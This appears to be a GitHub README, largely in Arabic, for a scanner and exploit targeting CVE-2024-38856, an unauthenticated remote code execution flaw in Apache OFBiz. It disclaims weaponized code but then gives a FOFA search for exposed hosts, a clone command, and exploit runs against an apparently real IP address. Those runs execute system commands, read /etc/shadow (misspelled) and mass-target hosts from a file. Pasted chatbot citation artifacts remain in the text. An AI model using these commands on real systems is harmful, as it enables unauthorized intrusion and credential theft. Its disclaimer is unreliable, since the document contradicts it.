
CVE-2024-38856: ماسح ضوئي واستغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache OFBiz
الغرض من المستودع: توثيق معلوماتي حول CVE-2024-38856 (Apache OFBiz - تفويض غير صحيح / RCE قبل المصادقة).
لا يحتوي هذا المستودع على كود استغلال مُسلّح. إنه مخصّص للبحث الدفاعي، والإرشادات المتعلقة بالتصحيح، والكشف، والاختبار المعملي الآمن فقط.
CVE-2024-38856 هي ثغرة تفويض غير صحيح في Apache OFBiz قد تسمح بوصول غير مصادق إلى نقاط نهاية معينة، وفي ظل ظروف محددة، تتيح تنفيذ كود عرض الشاشة مما قد يؤدي إلى تنفيذ برمجي عن بُعد على الأنظمة المتأثرة. تم إصلاح المشكلة في Apache OFBiz 18.12.15؛ الإصدارات السابقة حتى 18.12.14 متأثرة. :contentReference[oaicite:0]{index=0}
الخطورة / الأثر: صنّف العديد من بائعي الأمن والباحثين هذه الثغرة على أنها حرجة — إذ يمكن أن تؤدي إلى تنفيذ برمجي عن بُعد دون مصادقة على النسخ المستضعفة، وقد لوحظت محاولات استغلال نشطة لها في البيئات الحقيقية. يجب على المسؤولين التعامل مع نسخ OFBiz المكشوفة كبنود معالجة ذات أولوية عالية. :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"